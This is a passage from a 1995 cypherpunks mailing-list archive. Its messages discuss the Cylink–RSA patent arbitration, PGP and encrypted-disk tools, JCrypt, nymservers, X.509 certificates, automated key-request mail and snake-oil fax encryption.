constitutes entrapment anymore?

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Wed, 27 Sep 95 12:13:05 PDT
To: chen@intuit.com (Mark Chen)
Subject: Re: macworld crypto articles
Message-ID: <v02130502ac8f4f64de57@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


>> In article <4444rl$nrh@life.ai.mit.edu> Chen writes:
>> > It's truly a deplorable state of affairs.
>> 
>> For the next version, include PGP free with every version of Quicken,
>> and have Quicken just "call" PGP.
>> 
>> Of course, users can encrypt their files now with PGP.  Is there an
>> Intuit bboard where someone could post instructions?
>
>This is a good idea.  I'll bring it up with the appropriate people.
>
>Right now, we only have some cheesy forums going on Compuserve and
>Prodigy; however, keep your eyes peeled.  We have other stuff in the
>works.

PGP is probably too unweildy for the non-hobbyist to comfortably use. I don't know if anyone else has suggested it but I'd strongly encourage Intuit to make CryptDisk for the Mac easily available. I use it to maintain an encrypted partition for my financial data and the user interface is quite simple. I believe the DOS equivalent is SecureDisk.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Wed, 27 Sep 95 12:13:07 PDT
To: cypherpunks@toad.com
Subject: (fwd) CYLINK Q&A on PKP Arbitration Decision
Message-ID: <199509271910.OAA23774@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: sci.crypt,talk.politics.crypto,alt.security.pgp
Path: news.unt.edu!cs.utexas.edu!howland.reston.ans.net!ix.netcom.com!netcom.com!jkennedy
From: jkennedy@netcom.com (John Kennedy)
Subject: CYLINK Q&A on PKP Arbitration Decision
Message-ID: <jkennedyDFK1tA.57D@netcom.com>
Keywords: Cylink, PKP, RSA, Public Key
Organization: CYLINK
Date: Wed, 27 Sep 1995 08:19:58 GMT
Lines: 277
Sender: jkennedy@netcom23.netcom.com
Xref: news.unt.edu sci.crypt:39749 talk.politics.crypto:12787 alt.security.pgp:43387

-----------------------------------------------------------------
CYLINK Q&A on PKP ARBITRATION

The following statement from Cylink Corporation has been posted to
sci.crypt, talk.politics.crypto, and alt.security.pgp since we
believe it will be of interest to a large and diverse set of readers. 
Please choose the appropriate newsgroup(s) to direct any follow-
ups.

A copy of this statement is also being placed on Cylink web page
(http://www.cylink.com).  Additional related materials and updates 
will also appear there.

Feel free to distribute this statement to other appropriate
newsgroups, mailing lists, and individuals.

-John C. Kennedy, Cylink Corporation 
 {ph: 408.735.5885 , jkennedy@cylink.com}

---------------------- Cylink Corporation -------------------------

September 26, 1995

IMPACT OF CYLINK VS. RSA ARBITRATION AWARD
FREQUENTLY ASKED QUESTIONS
     
Q. Why is the recent arbitration award between Cylink and RSA Data
Security significant for RSA's licensees and vendors of public key
cryptography in general?
     
     A. The arbitration award is important to RSA's licensees for
     two reasons:
     
     First, the award makes it very clear that RSA does not have
     the right to authorize its customers to copy RSA's software;
     it doesn't matter whether the RSA customer is merely copying
     object code versions of RSA's products. The right to copy RSA
     software requires a patent license.
     
     Second, until now RSA has claimed itself to be the de facto
     standard in public key cryptography.  This claim was possible
     only so long as RSA could prevent its competitors from getting
     patent licenses from Public Key Partners.  Now that the
     arbitrators have dissolved PKP, Cylink can enable vendors to
     practice low cost public key technology without the use of
     RSA.  The market will finally enjoy vigorous competition based
     on technology and price.
     
Q. In a recent statement, RSA's president still makes the claim
that the use of RSA software does not require a separate patent
license.  Is that true?
     
     A. That statement is not true for any RSA licensee who needs
     the right to copy RSA software.  The heart of RSA's business
     is licensing so-called tool kits; the vendor takes one copy,
     incorporates it into the vendor's own product and then makes
     all of its own copies.  The only RSA customers who don't need
     a patent license are those who don't copy RSA software.
     
Q. That could be pretty serious for RSA and its customers.  Can you
back up this statement?
     
     A. Absolutely.  Read the arbitrators' award at p. 14.  If you
     haven't received a copy from RSA you can find it on Cylink's
     home page (http://www.cylink.com).  

     Don't take our word for it.  When RSA's own attorneys pleaded
     with the arbitrators to change their decision, they admitted
     that "... every single RSA licensee will now be required to
     obtain a Stanford Patent License from Cylink or run the risk
     of being sued" (ask RSA for a copy its attorneys' letter dated
     September 7).  In a second decision dated September 12, the
     arbitrators flatly rejected RSA's pleas and confirmed their
     restrictions on the rights of RSA's customers. (a copy is also
     available from Cylink's home page).
     
Q. RSA's president promises to indemnify all of its customers.  Why
should they be concerned?
     
     A. If you compare RSA's size against the size and number of
     its customers copying RSA's software, one should ask whether
     RSA's pockets are deep enough to reimburse its customers for
     the damage RSA has caused.
     
Q. Did RSA know it did not have all of the rights it promised its
customers in RSA's software licenses?
     
     A. Shortly after RSA gave up its patent rights to PKP, Cylink
     began warning RSA that its did not have all of the rights it
     was promising some of its customers. Unfortunately, Cylink had
     to finally bring the arbitration to straighten this out. 
     
Q. Why do RSA's customers need a license to the Stanford patents
simply to copy RSA's software?
     
     A. Two reasons.  The Stanford Hellman-Merkle patent is the
     very first patent to describe Dr. Hellman's brilliant
     invention of public key cryptography.  All subsequent
     refinements on this pioneer patent which implement Dr.
     Hellman's concept, such as the RSA algorithm, require a
     license to Dr. Hellman's patent.  
    
     Secondly, the Diffie-Hellman key exchange technique is a
     standard feature in many of RSA's tool kits, which is also
     covered by Stanford's Diffie-Hellman patent.  Finally, if RSA
     were correct in its statements that you don't need a Stanford
     license to use RSA's software, why would they embark on yet
     another expensive lawsuit to attack the patents?
     
Q. Isn't the Hellman-Merkle patent limited to practicing something
called the knapsack?
     
     A. No.  As the pioneer patent in public key, the inventors
     were required to disclose only one implementation to support
     their ground breaking invention.  Even if no one is using the
     knapsack itself, this particular patent continues to cover all
     practice of public key.  Only improvements, such as the RSA
     algorithm described in MIT's patent, are limited to the
     specific enablement described in the patent.
     
     Again, don't just take our word for it.  RSA itself admits
     that RSA software is covered by these patents.  Just look at
     their license for RSAREF, Paragraph 6 (before they have time
     to change it).
     
Q. But RSA has now brought suit to invalidate the Stanford Patents. 
Doesn't this protect RSA's customers?
     
     A. RSA's attempt to invalidate the very patents it had been
     licensing as a partner in PKP does nothing for RSA's
     customers.  First of all, the fact that someone else is
     challenging the validity of a patent doesn't make an infringer
     immune from suit.  RSA's challenge to the Stanford patent
     would not prevent Cylink from suing and obtaining damages and
     an injunction against any infringer.  (Indemnity for damages,
     by the way, is cold comfort if an RSA customer is enjoined
     from selling any public key software.)
     
     Second, anyone who waits around for RSA's case to be resolved
     is taking a big gamble.  Patents are presumed valid and RSA
     will have to prove invalidity under the "clear and convincing"
     burden of proof (which is higher than the traditional
     "preponderance of the evidence" standard and just below the
     criminal "reasonable doubt" standard).  If RSA looses the
     suit, all of its customers will be left hanging.  An RSA
     indemnity won't be worth much if RSA goes into bankruptcy.
     
Q. RSA claims that Cylink "confirmed" to RSA licensees "in writing"
"that no separate patent licenses were necessary if they licensed
RSA software."  Is this true?
     
     A. No.  During the arbitration, however, one prospective RSA
     licensee approached Cylink and said that RSA kept assuring
     them that they didn't need a patent license to make their own
     copies of RSA public key software, but they had gotten
     suspicious when their own lawyers looked at the question
     closely.  Cylink told the prospect that a patent license was
     needed for some of their projects, but in this instance Cylink
     would not interfere with the pending RSA deal.  

     RSA customers who take the initiative and contact Cylink (as
     in this special case) can expect cooperation in resolving the
     patent problem.
     
Q. Why was PKP formed?
     
     A. Cylink formed PKP with RSA to pool both parties' rights to
     the Stanford and MIT patents, promote public key technology,
     and generate licensing revenue for the partners, the
     universities which owned the patents, and the inventors. 
      
Q. Why was PKP dissolved?
     
     A. Obviously great animosity has grown between the parties. 
     The main reason is that RSA frustrated Cylink's efforts to
     settle the U.S. Government's efforts to license the Digital
     Signature Standard. Now that Cylink has the Stanford patents
     back, the DSS as well as other public key techniques can begin
     competing with RSA in the market.  
     
Q. How will these public key implementations compete with RSA?
Isn't RSA a "de facto" standard?
     
     A. If anything, RSA software (which includes Stanford
     algorithms such as Diffie-Hellman) has been prevalent by
     "default" - not by choice.  Now the market will have a choice
     between multiple vendors competing on price as well as
     technical implementation.  Only after RSA's software faces the
     test of competition can it fairly claim to be a standard.
     
Q. In his recent statement, RSA's president makes numerous
accusations about Cylink's use of the RSA algorithm.  What are the
facts?
     
     A. The arbitrators award is very clear that Cylink in fact has
     certain rights to license the MIT patent.  Specifically,
     Cylink has an option to license the MIT patent provided it
     uses some software provided by RSA.  This places Cylink in a
     better position than RSA's other customers who have no rights
     to the Stanford patents.  

     It is important to remember that Cylink built its business for
     the last ten years on the use of Stanford public key
     technology - which proves our point that you don't need RSA or
     its software to practice public key.
     
Q. Doesn't Cylink use the RSA algorithm in one of its products.
     
     A. Yes, and only one.  What RSA fails to mention is that
     Cylink's largest customer, SWIFT, already holds its own PKP
     license which the arbitrators forced RSA to grant.  This
     license allows Cylink to make the product for SWIFT.
     
Q. RSA claims that Cylink was offered a license to the RSA Patent,
and that Cylink turned it down.  Is that true?  
     
     A. Like a lot of what RSA says, it's a half-truth.  In June,
     1994, RSA did offer a patent license, and Cylink did turn it
     down.  Why?  Because a condition of the license was that
     Cylink release RSA for all liability for its licensing
     practices.  In other words, the price for the license was more
     than just the royalty.  Cylink was being asked to forgive RSA
     for the wrongs it committed over the years, and this Cylink
     would not do.
     
Q. Why did Cylink decide to use RSA is this one product?
     
     A. During PKP's existence, RSA frequently sought Cylink's
     support for its technology by asking Cylink to use RSA.  While
     RSA now tells a different story, RSA's own newsletter (see,
     for example RSA's "Ciphertext" Fall 1993 issue) and corporate
     profile frequently promoted Cylink's use of RSA long before
     the parties fell into their dispute over licensing DSS. 
     Having cooperated with RSA, and agreed to use their technology
     in one product, RSA tried to blackmail Cylink to stop PKP's
     settlement with the Government.
     
     In any event, the restrictions imposed by the arbitrators on
     RSA's licensing business are far more severe than the minor
     inconvenience Cylink may experience in retro-fitting its
     product with Stanford technology.
     
Q. What will Cylink do with the Stanford patents now?
     
     A. Before the arbitrators' decision many of RSA's customers
     had no reason to doubt RSA's word.  Those RSA customers who
     now come forward will be offered very favorable agreements.
     Cylink is more interested in establishing commercial
     relationships with RSA's licensees and promoting public key
     technology than in disrupting existing business.  
     
Q. Will Cylink attempt to stop the non-commercial use of public key
(such as in PGP)?
     
     A. No.  Although, technically, a Stanford patent license is
     needed for the public domain software such as PGP, Cylink
     intends to promote the use of public key on the Internet. 
     Cylink intends to announce a royalty-free license for personal
     use after meeting with a spokesperson for the PGP community. 
     Watch Cylink's home page for details. (http://www.cylink.com)
     
Q. What advice can you give?
     
     A. Get the facts first.  Read the arbitrators decision,
     including their September 12 ruling which denied RSA's request
     for modification.  Then call us.  

     (Call Bob Fougner at 408-735-5893, fax 408-735-6642, e-mail:
     fougner@cylink.com).

---------------------- Cylink Corporation -------------------------

John Kennedy 
Cylink Corporation
408-735-5885
jkennedy@cylink.com


--
"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 27 Sep 95 14:17:14 PDT
To: sameer <sameer@c2.org>
Subject: Re: JCrypt (was: getting netscape to support the remailers)
Message-ID: <v02120d08ac8f7bd3198e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>        That was what I was thinking as well. I am confused by
>Netscape's java support though.. I haven't seen very many details. Is
>netscape going to only support applets or can you add stuff to the
>runtime as well? In order to use jcrypt one needs access to add stuff
>to the runtime I beleive.

Currently jcrypt is implemented as a glue layer on top of RSAREF.
This means it has to be accessed through native methods. Also,
in general, one doesn't want to be downloading trusted security code
every time one uses it, even if it has strong authentication (and
this hasn't been built into Java yet.)

So there are two questions:

  o Will netscape allow local trusted Java code to be invoked
    by downloaded applets?
  o Will netscape support native methods in such code?

I would _greatly_ prefer to implement the jcrypt code in 100%
java, but there are legal barriers to doing this where RSA is
patented. JCrypt, however, is designed to allow the native
methods to be replaced with Java should someone desire to do
that.

Also, there are other architectural concerns involving the
direct or indirect invocation of local trusted encryption code
by untrusted, downloaded software, which will be addressed
somewhat in the next release of JCrypt.

>
>>
>> >     I started thinking about what it would take to get Netscape
>> >  to support sending mail through the remailers, after having
>> >  read the S/MIME specs which Netscape 2.0 is apparently going to
>> >  support. Perhaps with enough browbeating Netscape 3.0 will support
>> >  the remailers.
>>
>> Netscape doesn't need to support remailers explicitly since Netscape
>>will be
>> supporting Java.  I think a remailer client is within Java's
>>capabilities...
>> Anyone disagree?
>>
>> andrew
>>
>
>
>--
>sameer                                          Voice:   510-601-9777
>Community ConneXion                             FAX:     510-601-9734
>An Internet Privacy Provider                    Dialin:  510-658-6376
>http://www.c2.org (or login as "guest")                 sameer@c2.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Tue, 26 Sep 95 21:23:28 PDT
To: cypherpunks@toad.com
Subject: chaos cryptography
Message-ID: <9509270423.AA03675@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all - saw this in New Scientist and thought you might be interested
(I guess it's more stenography than cryptography):

==========
"Secret signals hidden in chaos

...John Hogan of the Engineering Mathematics department at Bristol
showed the BA how such unpredictable systems can be used to protect
sensitive information. His team mixed the information with chaotic
electrical signals, transmitted the result, and then extracted the
hidden message.

Hogan and his team modified simple electrical circuits to generate
unpredictable signals and hid within them a recording of "Land of 
Hope and Glory". When the two identical circuits are connected, said
Hogan, the outputs instantly synchronise so that anything added to 
the transmission stands out. "It's like magic." he said.

If anyone intercepted the signal and fed it through a loudspeaker
all they would hear is a loud hiss. This makes the system suitable for
hiding confidential information - once, that is, the system is perfected.
At present, a decoded message sounds like a scratchy 78 recording
although it is still recognisable, said Hogan.

So far the researchers have succeeded only when the two circuits are
connected by wire a few cm long. They are now trying to replicate
the results in circuits that are seperated by long distances and
connected by a radio link. They also want to see if it can be modified
for use with digital equipment."
============

Sherry

ps I wonder how close to real noise the "hiss" is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 27 Sep 95 11:33:47 PDT
To: tcmay@got.net
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
In-Reply-To: <ac8ed65501021004cc69@[205.199.118.202]>
Message-ID: <199509271833.OAA13270@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Wed Sep 27 14:33:28 1995

>  Date: Wed, 27 Sep 1995 10:39:21 -0700
>  From: tcmay@got.net (Timothy C. May)
>  
>  At 4:28 PM 9/27/95, Travis Corcoran wrote:
>  
>  >As the author of the package in question, I would like to point out:
>  >
>  >(1) the email msg Tim refers to (hereafter refered to by me as "query-mail")
>  >                was a request for information, not a warning
>  

>  I don't sign my messages, never have, so I see no way this "agent" Travis
>  ran could find such a signed message from me.

OK, then this sidetracks the discussion, as it seems we've got a bug
in either software behavior (despite a fair amount of testing) or user
behavior.

If it's the former, I apologize for any hassle my software caused.
I'll investigate this and issue a fix if it is a software problem.
However, I remind you that the query-mail said in it

- ------------------------------ snip! ------------------------------

	If there is a bug w this sftwr (for example, you never PGP sign your
	msgs, so this entire msg makes no sense) [ ... ] please mail the
	author of this package ( tjic@openmarket.com )

- ------------------------------ snip! ------------------------------

For future reference, if anyone finds a bug in any of my software
(free or otherwise), it is much more likely to get fixed by mailing me
directly than by posting a manifesto about the class of software as a
whole to a mailing list or newsgroup.

>  >A question: in a situation like this one, where an individual
>  >signed a message with a key then did not make a key with the
>  >return address of his message available [ ... ] what next step -if
>  >any- do people think is more appropriate than sending mail to the
>  >individual asking them for a copy of the key ?
>
>  Ignore it. Why hassle people who have no plan or finger
>  configurations?

Well, during the year or so I've been using my package I've tried to
verify thousands of posts.  In hundreds of these times, I've not had
the key on hand and had to use finger or the keysevers.  In dozens of
these times, finger and the keyserver failed, I sent mail to the
original poster, and got a response back along the lines of:

		"Unfortunately finger doesn't work at my site, but my key is on the
		keysever...oh, wait...the address on the key is 6 months out of date!
		Sorry!  Just updated it.  { Try now. | My updated key is below }."  

Thus, history has shown that it is often quite valid to ask people for
their keys when all other avenues have been exhausted.

Further, I imagine that the vast majority of people who sign public
UseNet messages intend for their messages to be verifiable, and thus
find it reasonable to be asked for their keys if their keys are not
easilly available.  If anyone thinks this is an incorrect assumption,
I'd like to hear their thinking.

>  Besides, people who really want to communicate with me with PGP
>  simply ask for it.

Uh...isn't that the purpose that the query mail ("Please mail me your
key.  Thank you.") was serving?

I'm not sure whether you're objecting to someone asked for your key,
or the fact that they did it through a semi-automated process.


I posted an idea for a scheme recently that would convey the datum "I
prefer PGP-encrypted mail" to intelligent cryptography-aware
news/mail-readers.  Perhaps the same scheme should be used to convey
the datum "I do feel the need for my PGP-signed messages to be
verified.  Please do not ask me for my key."  While it would be easy
enough to implement, I'm not sure how many people would choose to
encode this tag into their sig block or headers...


>  If you don't like this, fine. But don't robo-interrogate and send
>  robo-warnings.

I think the phrase "robo-interogate" is pretty strong for sending a
piece of email that has as its central message 

		"Please mail me your key.  Thank you."

The phrase "robo-warnings" is even less appropriate and relevant.


For the record, the full text of the query mail (including all three
uses of the word "please", and all 0 references to "warnings",
"interogations", and "truncheons" ) is:

- ------------------------------ snip! ------------------------------

	To: < mail-signer >
	Subject: please send me your PGP public key


	Hello.  While reading either email or UseNet I came across a PGP
	signed msg from you, but did not have your public key to verify it
	with.  My mail/newsreader fingered your account for your key and
	failed.  It then tried to get your key from the keyserver at

		< keyserver-address >

	but the key was not there.  Please mail me your key.  Thank you.

	 (If you think that the key should be there, be aware that my
	mailreader searched for the key by your email addr as seen by me - the
	same addr *this* piece of mail is being sent to.  If you registered a
	key with the server, that key may not have on it your addr as it is
	seen by the rest of the world.)

	P.S.  This mail was composed by my mailreading sftwr, which
	automatically scans incoming mail, looking for failed keyserver
	requests, and prompts me whether it should automatically send this msg
	on my behalf.  If there is a bug w this sftwr (for example, you never
	PGP sign your msgs, so this entire msg makes no sense), or if you're
	interested in the software itself (mail-secure.el: a package in lisp
	for emacs; this is just one of the many crypto/privacy related things
	it does) please mail the author of this package ( tjic@openmarket.com)
	for details.

- ------------------------------ snip! ------------------------------

If anyone has a constructive suggestion as to how this mail could be
changed to convey more information or to be less "threatening", please
mail me.

- -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	  PGP encrypted mail preferred.   Ask me about gnuslive.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMGmY+YJYfGX+MQb5AQGIvQP+KWoHrZeFYqWdyTe8K4iUrXvL6xtjG9S4
QLIkk2n6Zmzw9lNc915B6teYgFf55EI6H1NIyrT8RQXS6TfinlphNc9kH0YJqWjE
SIpEmfre6HuvHfYcWHLGb8hgX0Smwfvoq/nVqy3DT1H7s0Sbm4Ko532BOUKKzVxY
r2VLj5XmzEg=
=ptpV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: alpha.c2.org nymserver
Message-ID: <199509272222.PAA13596@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Also, I am having a LOT of grief trying to get the alpha.c2.org  remailer to
>> work for me... (yes, I have the help files)
>> Could someone walk me through it? 
>
>You mean the nym server at alpha.c2.org? It seems to have about a 1 week
>delay on it...
> 
>Be sure the reply block that you give it is your own, and that you tell
>alpha which remailer the reply block goes to.

If you get a copy of the latest Private Idaho beta, it's got a convenient set
of user interfaces for using the nymservers, as well as for PGP, remailers, etc.
(Runs on Windows, so some of you may not find it all _that_ convenient :-)
PI works with either vanilla PGP or ViaCrypt.
The first step is to get the PGP key for alias@alpha.c2.org installed in your
key ring, and update PI's key tables (a menu item).  Then choose the "Create
a nym"
menu item and follow all the dialog boxes.  I found it a little confusing at
first,
since I didn't realize the nymserver just uses secret-key encryption and not 
public-key, so you don't need to create a public-key-pair to do it - the only
PGP involved is encrypting the message sent to the nymserver.

So you can now send mail to the _highly_ anonymous wcs@alpha.c2.org :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:24:06 PDT
To: jay.hyden@alpha.c2.org
Subject: Re: Time Keys, Some Secure Ideas (by Alias: Jay Hyden)
Message-ID: <199509272223.PAA13696@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jay - you wrote:
>             >> Time Keys, Some Secure Ideas <<
> The weakest attack on a time key based system is to spoof the
>computer that keeps track of time into releasing encryption
>keys i.e. change the clock.

No, the weakest link is that you have to trust the person _running_
the time key system.  Spoofing the clock only matters to a system 
you trust.  Even a system running on a satellite isn't trustable
unless you're running it yourself; your good friend and business partner
who launched it may have put in a backdoor because the KGB threatened
to kill his grandmother if he didn't.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:24:29 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
Message-ID: <199509272223.PAA13730@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> I've never even _seen_ a copy of Notes running on any machine, nor do I
>> know directly of _any_ of my colleagues who has. (Not saying nobody has, of
>> course, just that I can't find anyone I know well who has.)

Notes was a PC network reimplementation of PLATO, the system that also inspired
notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was
originally inspired by PLATO or not...)  Netnews assumes that articles are
going to propagate for a while and then be trashed; notesfiles assumes you're
building a knowledge bases that sticks around.  (This transitoriness has allowed
netnews to scale to its current N*100MB/day of trash :-) 
 
Notes is oriented more toward business kinds of collaboration, though it would
work fine with university research projects.  It's got all the PCish things
you'd expect, with GUIs and menus and icons that let you include various sorts
of documents and pictures as well as text; it seemed to be done reasonably well,
and there's a growing market for Notes administrators.  One definition of
"business"
is "customers who want this stuff enough that we can charge them big bucks
for the servers"; client software has come down in price due to market
resistance.

One difficulty with Notes is that the earlier versions liked to run on
Novell IPX
instead of TCP/IP, so it didn't immediately jump onto companies' internal IP
nets,
or onto the global net for those brave souls willing to expose their business
communications systems to the world.  I do know companies who run multiple Notes
systems so that Project X can communicate with its teaming partners at
Company Y;
I don't know how much integration they have with their internal Notes systems.

AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX
network
to support Notes on; I think it's now rolled out an accepting customers,
but it was mostly in press-release stage while I was at AT&T.

Notes does have encryption, using RSA and I think RC4; I'm not sure if they
do the 
40 bits exportable/ 128 domestic bit or just use 40 bits.  Don't know about
overflow
kinds of bugs; the bugs I've heard about were more problems integrating with
Cc:Mail :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:23:59 PDT
To: cypherpunks@toad.com
Subject: X.509, S/MIME, and evolution of PGP
Message-ID: <199509272223.PAA13812@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'd always heard X.509 public key certificates were a hierarchical, evil,
anti-WebOfTrust ISOism.  But Netscape is now doing them, and talking S/MIME,
so I sat down to read the specs, and they're really not all that bad.  
(Technically, I've only read PKCS#6 and RFC 1422, and not the real ISOisms...)
Yeah, they've got lots of clunky ASN.1 Ambiguous Encoding Rules and X.500 
Silly Name Format, but those can be lived with, and the X.500 may be possible
to simply ignore in most cases.  Steve Kent, author of RFC1422, envisions that
a hierarchical world with government certification authorities would be the
most convenient implementation, and with the X.500 directory service serving
certificates, but that's primarily editorial and not required by the technology.

Since a zillion and a half people are about to acquire Netscape 2.0,
which supports non-Verisign-signed X.509 certificates and DES, we can 
definitely extend the Web of Trust concept to that world; can we also 
extend secure user-to-user messaging?  It's time for PGP to mutate and
take over the world...

An X.509 certificate has the following components  
       1.  version

       2.  serial number

       3.  signature (algorithm ID and parameters)

       4.  issuer name

       5.  validity period

       6.  subject name

       7.  subject public key (and associated algorithm ID)
expressed as ASN.1 and signed with the issuer's public key.  The issuer and
subject names are expressed as X.500 addresses (big deal).  The CA's public key
is expected to be obtained out of band, or as a chain of signatures from
some other CA that you got a signature for out of band; there's no policy
implementation that says who can be one.  The primary requirements on CAs are
to never issue the same serial number twice, maintain uniqueness on 
signatures for subjects, and maintain a Certificate Revocation List which
is accessible somehow.  Unfortunately, the data format doesn't support
multiple signatures, but the documentation _does_ explicitly indicate that
you can _have_ multiple certifications; you just have to drag around
a bunch of separate certificates, leading to some obvious implementation
opportunities.  CRLs are less well-specified, though the PEM RFCs suggest
a PEM format; the main requirement is that they be keyed off the serial number,
which is why that has to be unique.

RFC 1422 proposes a rooted hierarchy of CAs - a root called the Internet Policy
Registration Authority, which would certify a bunch of Policy Certification
Authorities,
which would each have different requirements on what their CAs require from
people who want to be certified, ranging from anonymous personas to heavily
identified Official People, and would do a certain amount of coordination to
preserve uniqueness.  Becoming a PCA would require paying money to the IPRA.
However, there's no requirement that a _specific_ organization become the
_one_ _official_ IPRA; if somebody were to volunteer and announce themselves
as the IPRA, there's no particular conflict-resolution mechanism.
[ maybe it's time for a Cypherpunks Press Release?  No - I didn't say it.
Not me! ]

But rootedness only really matters to software that cares... and as long
as your software accommodates N levels of certification, you can
have a Web of Trust getting back to a key you signed yourself, and either
get an official personna certificate or plug your public key into your
software as the IPRA (and sign the real IPRA's certificate yourself :-)

Problems:
1) ITAR - shouldn't be a big deal, because all of this is building a
signature/authentication mechanism, it's not doing any encryption.
The encryption, if any, is a user agent issue, and that's Netscape's problem;
the Web of Trust tool is an add-on.

2) RSA patent - can this be built with RSAREF?  Or RSAREF with permission
for a couple extra activities?  Or built out of RIPEM or RIPEM-SIG?
The latter has the benefit of already being exportable.

3) Netscape compliance - the Netscape folks have been real friendly,
and I hope they'll leave their format for getting certificates open.

4) Other software and CA policy-makers - getting out first is worth something;
then you're the standard that they have to follow instead of the other way
around.
For some issues, like X.500 name vs. DNS name, there are probably people 
in the IETF or community in general working on it, or alternatively 
you can do an ugly hack abusing the organization and address fields.

5) S/MIME - real S/MIME compliance requires support for RC2 as well as
publicly available algorithms, though this is really just an X.509 handler.

6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
related code in SSLeay to steal to help implement it?




#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 27 Sep 95 12:32:52 PDT
To: cypherpunks@toad.com
Subject: Re: Fax encryption software
Message-ID: <199509271930.PAA28222@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9509262116.A7081-0100000@netcom7>,
grafolog@netcom.com (Jonathan Blake) wrote:

>        I saw this article in alt.privacy.
>
>        Anybody think the described encryption actually is worth 
>        looking at.

[...]
>We are talking about a 72 bit engine that is more than 
>sufficiently strong for time sensitive general business purposes. 
[...]
>>>It is fully licensed, without restriction for export, by the 
>U.S. 
>>>Department of Commerce. NO PGP WORRIES.

These two statements are mutually exclusive. Snakeoil.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGmmZyoZzwIn1bdtAQFrsQF/edmKXMashWa+yP9E4N/M0c/Rgwa4I6rm
0g0K8TzPc8hl4dP01Euiqcm1LAgHqbiL
=rRO8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 27 Sep 95 07:45:58 PDT
To: cypherpunks@toad.com
Subject: Re: NO weak links in DigiCash system!!!
In-Reply-To: <199509271227.NAA14451@digicash.com>
Message-ID: <Pine.HPP.3.91.950927144813.22239A-100000@cor.sos.sll.se>
